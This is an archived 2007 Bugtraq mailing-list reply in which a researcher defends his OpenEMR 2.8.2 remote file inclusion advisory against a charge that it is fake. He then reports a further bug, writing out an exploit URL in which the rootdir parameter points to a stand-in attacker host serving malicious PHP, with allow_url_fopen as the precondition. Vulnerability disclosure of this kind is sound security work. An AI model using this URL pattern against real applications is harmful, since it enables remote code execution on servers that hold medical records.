| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 29 Jan 2007 20:14:16 +0100 From: Michał Melewski <mike@...stein.kill-9.pl> To: bugtraq@...urityfocus.com Cc: bzhbfzj3001@...akemail.com Subject: Re: Fake: Open Conference Systems = 2.8.2 Remote File Inclusion Dnia 29-01-2007, pon o godzinie 14:11 +0100, bzhbfzj3001@...akemail.com napisał(a): [...] > Unfortunately your advisory is once again, fake. The variable you are > referring to is set in interface/globals.php which is of course included > before the mentioned include statement. > Hmm, it isn't fake - i was able to exploit this bug. This software (i mean openemr) i so badly written that i have been able to find few other bugs, like: """ Possible RCE in OpenEMR 2.8.2 Exploit: http://example.com/openemr/interface/login/login_frame.php?rootdir=http://hack.me/ Place login/filler.php in your root of http://hack.me/ server directory with some 3vil PHP code. Risk: Critical Precautions: - allow_url_fopen needs to be turned on """ I belive it is possible to find many similar, but m train trip was rather short. However, this software is so badly written, that finding such bugs is extremely low hanging fruit. > Tinus -- Michael "carstein" Melewski | "We have no future bacause our present carstein()7thguard.net | is too volatile. We have only risk mobile: 512 357 303 | management. The spinning of the given JID: carstein()gentoo.pl | moment's scenarios. Pattern recognition.
Powered by blists - more mailing lists